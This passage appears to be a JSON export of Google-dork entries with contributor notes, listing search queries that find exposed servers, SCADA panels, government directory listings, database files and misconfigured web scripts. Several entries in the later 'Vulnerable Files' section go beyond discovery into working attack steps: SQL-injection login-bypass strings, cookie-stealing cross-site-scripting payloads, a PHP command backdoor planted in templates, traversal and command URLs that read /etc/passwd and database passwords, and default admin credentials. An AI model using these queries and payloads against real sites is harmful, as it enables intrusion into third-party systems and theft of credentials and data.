| Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "inurl:?XDEBUG_SESSION_START=phpstorm", "description": "#Google Dork :\r\n\r\ninurl:?XDEBUG_SESSION_START\r\n\r\n#Summary:\r\n\r\nXdebug is a php extension that allows to debug php pages, remotely by using DGBp protocol.\r\n- Code execution is possible through eval or property_set xdebug commands.\r\n- Attacker is also able to read content of file using source xdebug command\r\n\r\n#Date : 24/01/2021\r\n#Exploit Author : Lutzenfried (Cl\u00e9ment Cruchet)\r\n\r\nThanks,\r\n\r\nLutzenfried (Cl\u00e9ment Cruchet)"}, {"dork": "inurl:/uploads/affwp-debug.log", "description": "inurl:/uploads/affwp-debug.log\r\n\r\nThank you\r\nRitesh Gohil\r\n\r\nSecurity Researcher / System Test Engineer / Network Administrato"}, {"dork": "inurl:CFIDE/adminapi", "description": "# Google Dork: inurl:CFIDE/adminapi\r\n# Date: 3/26/2020\r\n# Exploit Author: Javier Bernardo"}, {"dork": "inurl:/javax.faces.resource/", "description": "# Dork: inurl:/javax.faces.resource/\r\n# Identify Java Server Faces Primefaces installations"}, {"dork": "intitle:\"GlassFish Server - Server Running\"", "description": "# Google Dork: intitle:\"GlassFish Server - Server Running\"\r\n\r\n# Web Server Detection\r\n\r\n# Date: 19/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Accueil WAMPSERVER\" intext:\"Configuration Serveur\"", "description": "# Google Dork: intitle:\"Accueil WAMPSERVER\" intext:\"Configuration Serveur\"\r\n\r\n# Web Server Detection\r\n\r\n# Date: 23/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:\"/domcfg.nsf\" \" Web Server Configuration\"", "description": "# Google Dork: inurl:\"/domcfg.nsf\" \" Web Server Configuration\"\r\n\r\n# Various servers running Lotus Domino.\r\n\r\n# Date: 29/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Miniweb Start Page\" | \"/CSS/Miniweb.css\"", "description": "# Dork: intitle:\"Miniweb Start Page\" | \"/CSS/Miniweb.css\"\r\n\r\nCategory: Scada Servers (Product: ControlLogix ,CompactLogix) Allen-Bradle\r\nRockwell Automation\r\n\r\nAuthor: Brijesh Joshi"}, {"dork": "inurl:/Portal0000.htm", "description": "#Dork: inurl:/Portal0000.htm"}, {"dork": "intitle:\"Current Network Status\" \"Nagios\"", "description": "# Google Dork: intitle:\"Current Network Status\" \"Nagios\"\r\n\r\n# Various Nagios Status pages.\r\n\r\n# Date: 28/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "filetype:axd inurl:/elmah.axd", "description": "# Title: Sensitive Information Disclosure\r\n# Google Dork: filetype:axd inurl:/elmah.axd\r\n# Date: 18/05/2021\r\n# Author: Prajwal Khante"}, {"dork": "\"Cisco Systems, Inc. All Rights Reserved.\" -cisco.com filetype:jsp", "description": "# Dork: \"Cisco Systems, Inc. All Rights Reserved.\" -cisco.com filetype:jsp"}, {"dork": "intitle:\"SOGo\" site:webmail.*", "description": "intitle:\"SOGo\" site:webmail.*"}, {"dork": "intitle:\"Server Backup Manager SE\"", "description": "intitle:\"Server Backup Manager SE\""}, {"dork": "inurl:\"web/database/selector\"", "description": "# Dork: inurl:\"web/database/selector\"\r\n# Find OpenERP database instances\r\n\r\n-- \r\nRegards,\r\n\r\n*Hilary Soita.*"}, {"dork": "intitle:\"Test Page for the HTTP Server on Fedora\"", "description": "#Dork: intitle:\"Test Page for the HTTP Server on Fedora\""}, {"dork": "intitle:\"Icecast Streaming Media Server\"", "description": "# Dork: intitle:\"Icecast Streaming Media Server\""}, {"dork": "intitle:\"Welcome to WildFly\" intext:\"Administration Console\"", "description": "# Google Dork: intitle:\"Welcome to WildFly\" intext:\"Administration Console\"\r\n\r\n# Web Server Detection\r\n\r\n# Date: 03/06/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Index of\" site:.gov intext:\"Server at\"", "description": "# Google Dork: intitle:\"Index of\" site:.gov intext:\u201dServer at\u201d\r\n\r\n# Web Server Detection\r\n\r\n# Date: 21/07/2021\r\n\r\n# Exploit Author: Aftab Alam\r\n\r\nDescription: This Dork shows all \u201cIndex of\u201d pages with server information of government web servers that have \u201c.gov\u201d in their URLs."}, {"dork": "intitle:\"Welcome\" intext:\"LiteSpeed Technologies, Inc. All Rights Reserved.\"", "description": "# Google Dork: intitle:\"Welcome\" intext:\"LiteSpeed Technologies, Inc. All Rights Reserved.\"\r\n\r\n# Web Server Detection\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"web server login\" intext:\"site ip\"", "description": "# Google Dork: intitle:\"web server login\" intext:\"site ip\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 02/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "inurl: /ftp intitle:\"office\"", "description": "# Google Dork: inurl: /ftp intitle:\"office\"\r\n# Web Server Detection\r\n# Date: 11/09/2021 \r\n# Exploit Author: Lawrence March"}, {"dork": "intitle:\"STEP by STIBO Systems\" \"Launch STEPworkbench\" \"Web UI Component Report\"", "description": "# Google Dork: intitle:\"STEP by STIBO Systems\" \"Launch STEPworkbench\" \"Web UI Component Report\"\r\n# Web Server Detection\r\n# Date: 15/09/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"nPerfServer\"", "description": "# Google Dork: intitle:\"nPerfServer\"\r\n# Web Server Detection\r\n# Date: 07/07/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"Domain Default page\" \"Parallels IP Holdings GmbH\"", "description": "# Google Dork: intitle:\"Domain Default page\" \"Parallels IP Holdings GmbH\"\r\n# Web Server Detection\r\n# Date: 23/06/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"index of\" \"/homedir/etc/\"", "description": "# Google Dork: intitle:\"index of\" \"/homedir/etc/\"\r\n# Web Server Detection\r\n# Date: 14/08/2021 \r\n# Exploit Author: Chahine Boutighane"}, {"dork": "intitle:\"index of\" AND inurl:magento AND inurl:/dev", "description": "# Google Dork: intitle:\"R WebServer\"\r\n# Web Server Detection\r\n# Date: 16/08/2021 \r\n# Exploit Author: Brahmaraj Rathod"}, {"dork": "\"Wowza Streaming Engine 4 Developer Edition\"", "description": "# Google Dork: \"Wowza Streaming Engine 4 Developer Edition\"\r\n# Web Server Detection\r\n# Date: 18/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"index of\" site:.gov.in", "description": "# Google Dork: intitle:\"index of\" site:.gov.in\r\n# Web Server Detection\r\n# Date: 21/09/2021 \r\n# Exploit Author: Deven Rathod"}, {"dork": "intitle:\"WATASHI SERVICE\"", "description": "# Google Dork: intitle:\"WATASHI SERVICE\"\r\n# Web Server Detetion\r\n# Date: 17/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"Success!\" intext:\"Your new web server is ready to use.\"", "description": "# Google Dork: intitle:\"Success!\" intext:\"Your new web server is ready to use.\"\r\n# Web Server Detection\r\n# Date:01/09/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"Welcome to OpenResty!\"", "description": "# Google Dork: intitle:\"Welcome to OpenResty!\"\r\n\r\n# Various Online Devices\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Shoutcast server\" inurl:\"/index.html\" \"SHOUTcast Server\"", "description": "# Google Dork: intitle:\"Shoutcast server\" inurl:\"/index.html\" \"SHOUTcast Server\"\r\n# Web Server Detection\r\n# Date: 04/09/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "\"NTRIP Caster Table Contents\" \"This is a SNIP NTRIP Caster\"", "description": "# Google Dork: \"NTRIP Caster Table Contents\" \"This is a SNIP NTRIP Caster\"\r\n# Web Server Detection\r\n# Date: 15/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:\"/app/kibana#\"", "description": "# Google Dork: inurl:\"/app/kibana#\"\r\n# Web Server Detection\r\n# Date: 21/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "Fwd: intitle:\"STEP by STIBO Systems\" \"Launch STEPworkbench\" \"Web UI Component Report\"", "description": "# Google Dork: Fwd: intitle:\"STEP by STIBO Systems\" \"Launch STEPworkbench\" \"Web UI Component Report\"\r\n# Web Server Detection\r\n# Date:10/10/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "site:*/*.asp", "description": "# Google Dork: site:*/*.asp\r\n# Web Server Detection\r\n# Date:14/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "inurl *:8080/login.php", "description": "# Google Dork: inurl *:8080/login.php\r\n# Web Server Detection\r\n# Date: 05/11/2021 \r\n# Exploit Author: Vivek Pancholi"}, {"dork": "site:vps-*.vps.ovh.net", "description": "# Dork: site:vps-*.vps.ovh.net\r\n# Author: Chahine Boutighane"}], "Vulnerable Files": [{"dork": "\"File Upload Manager v1.3\" \"rename to\"", "description": "thepeak file upload manager let you manage your webtree with up and downloading files."}, {"dork": "filetype:pl -intext:\"/usr/bin/perl\" inurl:webcal (inurl:webcal | inurl:add | inurl:delete | inurl:config)", "description": "WebCal allows you to create and maintain an interactive events calendar or scheduling system on your Web site. The file names explain themselves, but don't abuse the faulty admins."}, {"dork": "inurl:cgi-bin inurl:bigate.cgi", "description": "Anonymous surfing with bigate.cgi. Remove http:// when you copy paste or it won't work."}, {"dork": "intitle:\"SSHVnc Applet\"OR intitle:\"SSHTerm Applet\"", "description": "sSHTerm Applet en SSHVnc Applet pages."}, {"dork": "filetype:mdb \"standard jet\" (password | username | user | pass)", "description": "These Microsoft Access Database files may contain usernames, passwords or simply prompts for such data."}, {"dork": "inurl:updown.php | intext:\"Powered by PHP Uploader Downloader\"", "description": "this (evil ) script lets you to upload a php shell on target server, in most cases not password protected dork: inurl:updown.php | intext:\"Powered by PHP Uploader Downloader\" a note: sometimes you don't see a link to a list of uploaded files... just switch to http://[target]/[path]/updown.php?action=download"}, {"dork": "inurl:\"simplenews/admin\"", "description": "hxxp://evuln.com/vulns/94/summary.html"}, {"dork": "TOO MANY", "description": "Click on any of the following links to show google's list!\r\n - _vti_inf.html (694 hits)\r\n - service.pwd (11,800 hits)\r\n - users.pwd (23 hits)\r\n - authors.pwd (22 hits)\r\n - administrators.pwd (22 hits)\r\n - shtml.dll (780 hits)\r\n - shtml.exe (761 hits)\r\n - fpcount.exe (1,370 hits)\r\n - default.asp (2,170 hits)\r\n - showcode.asp (4 hits)\r\n - sendmail.cfm (5 hits)\r\n - getFile.cfm (7 hits)\r\n - imagemap.exe (510 hits)\r\n - test.bat (353 hits)\r\n - msadcs.dll (8 hits)\r\n - htimage.exe (513 hits)\r\n - counter.exe (164 hits)\r\n - browser.inc (11 hits)\r\n - hello.bat (18 hits)\r\n - default.asp\\ (2,170 hits)\r\n - dvwssr.dll (571 hits)\r\n - dvwssr.dll (571 hits)\r\n - dvwssr.dll (571 hits)\r\n - cart32.exe (9 hits)\r\n - add.exe (38 hits)\r\n - index.JSP (998 hits)\r\n - index.jsp (998 hits)\r\n - SessionServlet (46 hits)\r\n - shtml.dll (780 hits)\r\n - index.cfm (473 hits)\r\n - page.cfm (5 hits)\r\n - shtml.exe (761 hits)\r\n - web_store.cgi (16 hits)\r\n - shop.cgi (63 hits)\r\n - upload.asp (27 hits)\r\n - default.asp (2,170 hits)\r\n - pbserver.dll (6 hits)\r\n - phf (370 hits)\r\n - test-cgi (1,560 hits)\r\n - finger (23,900 hits)\r\n - Count.cgi (8,710 hits)\r\n - jj (5,600 hits)\r\n - php.cgi (170 hits)\r\n - php (48,000 hits)\r\n - nph-test-cgi (132 hits)\r\n - handler (9,220 hits)\r\n - webdist.cgi (35 hits)\r\n - webgais (37 hits)\r\n - websendmail (12 hits)\r\n - faxsurvey (27 hits)\r\n - htmlscript (50 hits)\r\n - perl.exe (340 hits)\r\n - wwwboard.pl (455 hits)\r\n - www-sql (26,500 hits)\r\n - view-source (641 hits)\r\n - campas (94 hits)\r\n - aglimpse (12 hits)\r\n - glimpse (4,530 hits)\r\n - man.sh (127 hits)\r\n - AT-admin.cgi (789 hits)\r\n - AT-generate.cgi (14 hits)\r\n - filemail.pl (5 hits)\r\n - maillist.pl (16 hits)\r\n - info2www (737 hits)\r\n - files.pl (267 hits)\r\n - bnbform.cgi (91 hits)\r\n - survey.cgi (93 hits)\r\n - classifieds.cgi (25 hits)\r\n - wrap (14,000 hits)\r\n - cgiwrap (1,270 hits)\r\n - edit.pl (114 hits)\r\n - perl (80,700 hits)\r\n - names.nsf (12 hits)\r\n - webgais (37 hits)\r\n - dumpenv.pl (7 hits)\r\n - test.cgi (1,560 hits)\r\n - submit.cgi (79 hits)\r\n - submit.cgi (79 hits)\r\n - guestbook.cgi (528 hits)\r\n - guestbook.pl (451 hits)\r\n - cachemgr.cgi (25 hits)\r\n - responder.cgi (4 hits)\r\n - perlshop.cgi (30 hits)\r\n - query (15,500 hits)\r\n - w3-msql (877 hits)\r\n - plusmail (12 hits)\r\n - htsearch (177 hits)\r\n - infosrch.cgi (19 hits)\r\n - publisher (2,610 hits)\r\n - ultraboard.cgi (24 hits)\r\n - db.cgi (96 hits)\r\n - formmail.cgi (420 hits)\r\n - allmanage.pl (5 hits)\r\n - ssi (9,550 hits)\r\n - adpassword.txt (39 hits)\r\n - redirect.cgi (60 hits)\r\n - f (124,000 hits)\r\n - cvsweb.cgi (78 hits)\r\n - login.jsp (241 hits)\r\n - login.jsp (241 hits)\r\n - dbconnect.inc (18 hits)\r\n - admin (57,000 hits)\r\n - htgrep (30 hits)\r\n - wais.pl (133 hits)\r\n - amadmin.pl (14 hits)\r\n - subscribe.pl (65 hits)\r\n - news.cgi (387 hits)\r\n - auctionweaver.pl (2 hits)\r\n - .htpasswd (2,390 hits)\r\n - acid_main.php (3 hits)\r\n - access_log (1,250 hits)\r\n - access-log (618 hits)\r\n - access.log (618 hits)\r\n - log.htm (386 hits)\r\n - log.html (1,310 hits)\r\n - log.txt (987 hits)\r\n - logfile (23,200 hits)\r\n - logfile.htm (76 hits)\r\n - logfile.html (671 hits)\r\n - logfile.txt (701 hits)\r\n - logger.html (37 hits)\r\n - stat.htm (398 hits)\r\n - stats.htm (687 hits)\r\n - stats.html (1,840 hits)\r\n - stats.txt (342 hits)\r\n - webaccess.htm (11 hits)\r\n - wwwstats.html (80 hits)\r\n - source.asp (11 hits)\r\n - perl (80,700 hits)\r\n - mailto.cgi (46 hits)\r\n - YaBB.pl (35 hits)\r\n - mailform.pl (670 hits)\r\n - cached_feed.cgi (6 hits)\r\n - cr (27,500 hits)\r\n - global.cgi (14 hits)\r\n - Search.pl (548 hits)\r\n - build.cgi (74 hits)\r\n - common.php (184 hits)\r\n - common.php (184 hits)\r\n - show (33,500 hits)\r\n - global.inc (114 hits)\r\n - ad.cgi (21 hits)\r\n - WSFTP.LOG (11 hits)\r\n - index.html~ (81,100 hits)\r\n - index.php~ (6,740 hits)\r\n - index.html.bak (690 hits)\r\n - index.php.bak (69 hits)\r\n - print.cgi (61 hits)\r\n - register.cgi (172 hits)\r\n - webdriver (35 hits)\r\n - bbs_forum.cgi (45 hits)\r\n - mysql.class (21 hits)\r\n - sendmail.inc (97 hits)\r\n - CrazyWWWBoard.cgi (68 hits)\r\n - search.pl (548 hits)\r\n - way-board.cgi (44 hits)\r\n - webpage.cgi (89 hits)\r\n - pwd.dat (22 hits)\r\n - adcycle (12 hits)\r\n - post-query (240 hits)\r\n - help.cgi (69 hits)"}, {"dork": "intitle:\"Index of /\" modified php.exe", "description": "PHP installed as a cgi-bin on a Windows Apache server will allow an attacker to view arbitrary files on the hard disk, for example by requesting \"/php/php.exe?c:\\boot.ini.\""}, {"dork": "filetype:php inurl:\"viewfile\" -\"index.php\" -\"idfil", "description": "Programmers do strange things sometimes and forget about security. This search is the perfect example. These php scripts are written for viewing files in the web directory (e.g. ww.XXX.com/viewfile.php?my_howto.txt --> will show you the my_howto.txt).An attacker can check for buggy php scripts wich allow you to view any file on the system (with webservers permissions). Try the good, old directory traversal trick: \"../../../\". You have to know the filename and location, but that's not a big problem (/etc/passwd anyone ?)."}, {"dork": "filetype:cnf my.cnf -cvs -example", "description": "The MySQL database system uses my.cnf files for configuration. It can include a lot of information, ranging from pathes, databasenames up to passwords and usernames.Beware this search still gives false positives (examples, templates)."}, {"dork": "filetype:wsdl wsdl", "description": "The XML headers are called *.wsdl files.they can include data, functions or objects. An attacker with knowledge of XML coding can sometimes do evil things with this stuff."}, {"dork": "filetype:inc inc intext:setcookie", "description": "Cookies are often used for authentication and a lot of other stuff.The \"inc\" php header files often include the exact syntax of the cookies. An attacker may create his own cookie with the information he has taken from the header file and start cookie poisining."}, {"dork": "ext:cgi inurl:ubb6_test.cgi", "description": "The UBB trial version contains files that are not safe to keep online after going live. The install files clearly state so:CAUTIONS Do not leave pathto.asp or ubb6_test.cgi on your server. Delete them from the server when you are done. Leaving them in place poses a security risk.\"This is the UBB6 Permissions & Paths Diagnostic Script.Example:UBB Version \t6.1.0.3 Perl Version \t5.006 Server Type \tApache/1.3.27 (Unix) (Red-Hat/Linux) mod_fastcgi/2.2.10 mod_jk/1.2.0 mod_perl/1.24_01 PHP/4.2.2 FrontPage/5.0.2 mod_ssl/2.8.12 OpenSSL/0.9.6b check path: \t1. \tcheck permission to write new files in this directory2. \tcheck for the 'required' files in both the CGI and this directory3. \tcheck my read/write permissions on all the variables files4. \tcheck my absolute paths in general settings if available \tversion 2.1 \t\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2001 Infopop Corporation All Rights Reserved"}, {"dork": "intitle:\"PHP Explorer\" ext:php (inurl:phpexplorer.php | inurl:list.php | inurl:browse.php)", "description": "This searches for PHP Explorer scripts. This looks like a file manager with some nice extra options for an attacker, such as phpinfo, create/list directories and execute command shell. Not many results in this search and some only cached. Over time this may prove to be interesting if Google finds more (or someone finds a better search method for them)."}, {"dork": "inurl:robpoll.cgi filetype:cgi", "description": "robpoll.cgi is used to administrate polls.The default password used for adding polls is 'robpoll'. All of the results should look something like this: \"http://www.example.com/robpoll.cgi?start\". An attacker may change robpoll.cgi pointing to admin like this: \"http://www.example.com/robpoll.cgi?admin\"."}, {"dork": "inurl:\"plog/register.php\"", "description": "pLog is a popular form of bloggin software. Currently there are estimated about 1450 sites running it. The installation documents clearly warn about removing files after installation for security purposes:\"If you are not planning to allow internet users to create new blogs in this server, then you should also remove register.php.\"This search finds that register.php form of course :)Below is some more general information about pLog.Vendor site: hxxp://www.plogworld.org/Admin portals http://sitename/plog/admin.phpInstallation wizard: http://sitename/plog/wizard.phpConfig file (mysql db pass): http://sitename/plog/config/config.properties.phpTemp files: http://sitename/plog/tmp/Gallery files: http://sitename/plog/gallery/Blog search engine: http://www.plogworld.org/ploogle/"}, {"dork": "link:http://www.toastforums.com/", "description": "Toast Forums is an ASP message board on the Internet. Toast Forums also has all the features of an advanced message board (see hxxp://www.toastforums.com/). The problem is in the install documentation (quoting):-- start quote --2. Rename the data.mdb file to a different name. After renaming the data.mdb file, open constants.asp and change the tstDBConnectString constant to reflect the new name. -- end quote --This search finds sites running Toast Forum by using the LINK: operator. Trial and error is needed to find the database file from the results by changing the URL. Member data can be found in the table \"tstdb_Member\". It looks like this:\"ID\" \"FName\" \"LName\" \"Username\" \"Password\" \"Email\" \"HideEmail\" \"ICQ\" \"Homepage\" \"Signature\" \"IP\" \"Skin\" \"IncludeSignature\" \"NotifyDefault\" \"PostCount\" \"LastLoginDate\" \"LastPostDate\"Passwords are encrypted with the RC4 algoritm, so an attacker would find cracking them is (more) difficult (than usual)."}, {"dork": "inurl:\"nph-proxy.cgi\" \"Start browsing through this CGI-based proxy\"", "description": "Observing the web cracker in the wild, one feels like they are watching a bear. Like a bear stocks up on food and then hibernates, a web cracker must stock up on proxies, and then hack until they run out.Web crackers are a distinct breed, and many do not comfort well with the draconian measures that many other crackers take, such as port and service scanning, the modern web cracker finds such tactics much too intrusive. This leaves the web cracker with the only viable option to come in contact with a large number of proxies being to use public proxy lists. These are of course very slow, and very very unstable, and do not allow the cracker much time between his proxy runs.Luckily google gives them another option, if they are smart enough to find it.CGI-proxy ( http://www.jmarshall.com/tools/cgiproxy/ ) is a CGI-based proxy application. It runs on a web server, and acts as an http proxy, in CGI form. A prudent site owner would hide it behind .htaccess, as most do, but with a powerful tool like google, the inprudent few who leave it open can quickly be seperated from the wise masses.CGI-proxy's default page contains the text, as you can see in the demo on their site:\"Start browsing through this CGI-based proxy by entering a URL below. Only HTTP and FTP URLs are supported. Not all functions will work (e.g. some JavaScript), but most pages will be fine.\"The proxy as it resides on a server is most often called nph-proxy.cgi. A web cracker can now use google to enumerate his list of proxy servers, like so:inurl:\"nph-proxy.cgi\" \"Start browsing through this CGI-based proxy\"More results can be obtained by admitting the \"inurl:nph-proxy.cgi\" constraint, but much more trash is generated as well."}, {"dork": "intitle:gallery inurl:setup \"Gallery configuration\"", "description": "Gallery is a popular images package for websites. Unfortunately, with so many users, more bugs will be found and Google will find more installations. This search finds Gallery sites that seem to have left more or less dangerous files on their servers, like resetadmin.php and others.We call it Gallery in Setup mode :)"}, {"dork": "\"create the Super User\" \"now by clicking here\"", "description": "PHP-Nuke is a popular web portal thingie. It has popped up in the Google dorks before. I think we let this one describe itself, quoting from a vulnerable page:\"Welcome to PHP-Nuke!Congratulations! You have now a web portal installed!. You can edit or change this message from the Administration page. For security reasons the best idea is to create the Super User right NOW by clicking HERE.\""}, {"dork": "filetype:lit lit (books|ebooks)", "description": "Tired of websearching ? Want something to read ? You can find Ebooks (thousands of them) with this search..LIT files can be opened with Microsoft Reader (http://www.microsoft.com/reader/)"}, {"dork": "inurl:cgi.asx?StoreID", "description": "BeyondTV is a web based software product which let you manage your TV station. All you need is to install a TV tuner card on your PC and Connect your TV source (i.e. television antenna) to your TV tuner card. With a installed BeyondTV version you can now administrate your TV with your browser even over the internet."}, {"dork": "inurl:\" WWWADMIN.PL\" intitle:\"wwwadmin\"", "description": "wwwadmin.pl is a script that allows a user with a valid username and password, to delete files and posts from the associated forum."}, {"dork": "inurl:changepassword.cgi -cvs", "description": "Allows a user to change his/her password for authentication to the system. Script allows for repeated failed attempts making this script vulnerable to brute force."}, {"dork": "intitle:\"Directory Listing\" \"tree view\"", "description": "Dirlist is an ASP script that list folders in an explorer style: * Tree * Detailed * Tiled Quote: *Lists files and directories in either a Tree, Detailed, or Tiled view. *Can set a \"Starting Directory\". This can be a IIS Virtual Directory path. *Displays file and directory properties. *Can specify directories which you do not want to display and access. *Can specify directories which you only want to display and access. *Can specify what file-types to only display. *Displays custom file-type icons. This can be turned off in the settings. * 'Detailed' and 'tiled' views display a Breadcrumb bar for easier navigation. This can be turned off in the settings."}, {"dork": "intitle:mywebftp \"Please enter your password\"", "description": "MyWebFTP Free is a free lite version of MyWebFTP Personal - a PHP script providing FTP client capabilities with the user interface in your browser. Install it on a remote server and easily connect to your FTP servers through a firewall or a proxy not allowing FTP connections. No PHP built-in FTP support is required. Perform actions on many files at once. Password protected from casual surfers wasting your bandwidth. Nice look and feel is easy customizable."}, {"dork": "ezBOO \"Administrator Panel\" -cvs", "description": "ezBOO WebStats is a high level statistical tool for web sites monitoring. It allows real time access monitoring on several sites. Based on php and mySQL it is easy to install and customization is made easy. It works on Unix, Linux and Windows"}, {"dork": "intitle:\"ASP FileMan\" Resend -site:iisworks.com", "description": "FileMan is a corporate web based storage and file management solution for intra- and internet. It runs on Microsoft IIS webservers and is written in ASP. All user and group settings are stored in a MS Access or SQL database. Default user: user=admin, pass=passIn the default installation a diagnostigs page calleddiags.asp exists the manual recommends to delete it, but it can be found in some installs. The path to the database is also on the page. If the server is not configured correctly, the mdb file can be downloaded and the passwords are not encrypted.Site admins have been notified. As always: DO NOT ABUSE THIS."}, {"dork": "intitle:\"phpremoteview\" filetype:php \"Name, Size,", "description": "phpRemoteView is webbased filemanger with a basic shell. With this an attacker can browse the server filesystem use the online php interpreter.vendor: http://php.spb.ru/remview/ (russian)"}, {"dork": "inurl:click.php intext:PHPClickLog", "description": "A script written in PHP 4 which logs a user's statistics when they click on a link. The log is stored in a flatfile (text) database and can be viewed/inspected through an administration section."}, {"dork": "\"powered by YellDL\"", "description": "Finds websites using YellDL (or also known as YellDownLoad), a download tracker written in PHP. Unfortunately this downloader downloads everything you want to, like its own files too:http://xxxxxxxxxx/download.php?f=../download&e=phpBy guessing some could download information which shoudln't get out of the server (think of ../phpMyAdmin/config.php or other stuff - no need to say that lazy people use same passwords for their DB- and FTP-login.Another search to find this software is:\"You are downloading *\" \"you are downloader number * of this file\""}, {"dork": "filetype:cgi inurl:cachemgr.cgi", "description": "cachemgr.cgi is a management interface for the Squid proxy service. It was installed by default in /cgi-bin by RedHat Linux 5.2 and 6.0 installed with Squid. This script prompts for a host and port which it then attempts to connect to. If a web server, such as apache, is running this can be used to connect to arbitrary hosts and ports, allowing for potential use as an intermediary in denial of service attacks, proxied port scans, etc. Interpreting the output of the script can allow the attacker to determine whether or not a connection was established."}, {"dork": "ext:asp inurl:DUgallery intitle:\"3.0\" -site:dugall", "description": "The MS access database can be downloaded from inside the docroot. The user table holds the admin password in plain text. Possible locations for the dugallery database are:http://xx/.../DUgallery/database/dugallery.mdbhttp://xx/.../DUgallery//_private/DUgallery.mdbhttp://www.securitytracker.com/alerts/2004/Nov/1012201.html"}, {"dork": "ext:asp \"powered by DUForum\" inurl:(messages|details|login|default|register) -site:duware.com", "description": "DUForum is one of those free forum software packages. The database location is determined by the config file \"connDUforumAdmin.asp\", but the installation instructions don't recommend changing it. Ouch..Database location is: http://server/duforum/_private/DUforum.mdb"}, {"dork": "\"Powered by Land Down Under 601\"", "description": "sQL injection vulnerability in Land Down Under 601 could give an attacker administrative access. An exploit exists on the internet, search google."}, {"dork": "inurl:php.exe filetype:exe -example.com", "description": "It is possible to read any file remotely on the server with PHP.EXE (assuming a script alias for it is enabled), even across drives. (Note: The GHDB has another search for this file based on directorly listings, try them both)"}, {"dork": "filetype:mdb inurl:\"news/news\"", "description": "Web Wiz Site News unprotected database holds config and admin information in a microsoft access database in news/news.mdb. This information is almost always unprotected."}, {"dork": "intitle:\"PHPstat\" intext:\"Browser\" intext:\"PHPstat setup\"", "description": "Phpstat shows nice statistical informatino about a website's visitors. Certain versions are also contain vulnerabilities: http://www.soulblack.com.ar/repo/papers/advisory/PhpStat_advisory.txt"}, {"dork": "\"Powered by Gravity Board\"", "description": "4.22 07/08/2005 Gravity Board X v1.1 (possibly prior versions) Remote code execution, SQL Injection / Login Bypass, cross site scripting, path disclosure poc software: author site: http://www.gravityboardx.com/ a) Sql Injection / Login Bypass: If magic_quotes off, A user can bypass login check and grant administrator privileges on target system: login: ' or isnull(1/0) /* password: whatever b) Cross site scripting poc: b.1)After he login as administrator he can edit template to insert evil javascript code. Try to insert at the end of the template these lines: alert(document.cookie) b.2)A user can craft a malicious url like this to access target user cookies: http://[target]/[path]/deletethread.php?board_id=\">alert(document.cookie) c) Remote commands/php code execution: c.1) Always editing the template, attacker can leave a backdoor in target system, example, at the end of template: After, the attacker can launch commands by this urls: http://[target]/[path]/index.php?cmd=ls%20-la to list directories... http://[target]/[path]/index.php?cmd=cat%20/etc/passwd to see Unix /etc/passwd file http://[target]/[path]/index.php?cmd=cat%20config.php to see database username/password c.2) An IMPORTANT NOTE: You can edit template without to be logged in as administator, calling editcss.php script, look at the code of this script: if($fp = fopen('gbxfinal.css','w')){ fwrite($fp, $csscontent); fclose($fp); echo ''; }else{ echo 'Gravity Board X was unable to save changes to the CSS template.'; } you can easily deface the forum and/or insert a backdoor calling an url like this: http://[target]/[path]/editcss.php?csscontent= then execute commands: http://[target]/[path]/index?cmd=[command] It's also possible to disclose path: d) path disclosure: http://[target]/[path]/deletethread.php?perm=1 http://[target]/[path]/ban.php http://[target]/[path]/addnews.php http://[target]/[path]/banned.php http://[target]/[path]/boardstats.php http://[target]/[path]/adminform.php http://[target]/[path]/forms/admininfo.php http://[target]/[path]/forms/announcements.php http://[target]/[path]/forms/banform.php ans so on...calling scripts in /forms directory"}, {"dork": "\"Powered by SilverNews\"", "description": "silvernews 2.0.3 (possibly previous versions ) SQL Injection / Login Bypass / Remote commands execution / cross site scripting software: author site: http://www.silver-scripts.de/scripts.php?l=en&script=SilverNews SQL Injection / Login bypass: A user can bypass admin password check, if magic_quotes is set to off: user: ' or isnull(1/0) /* pass: whatever remote commands execution: now, new admin can edit template, clicking on Templates -> Global footer, can add the lines: //*********************************************** TEMPLATE; } } system($HTTP_GET_VARS[command]); /* to leave a backdoor in template file /templates/tpl_global.php now can launch system commands on the target system with theese urls: http://[target]/[path]//templates/tpl_global.php?command=ls%20-la to list directories http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/etc/passwd to see /etc/passwd file http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/[path_to_config_file]/data.inc.php to see Mysql database password cross site scripting: same way, a user can hide evil javascript code in template"}, {"dork": "PHPFreeNews inurl:Admin.php", "description": "29/07/2005 8.36.03PHPFreeNews Version 1.32 (& previous) sql injection/login bypass, cross site scripting, path disclosure, information disclosure author site: http://www.phpfreenews.co.uk/Main_Intro.phpxss 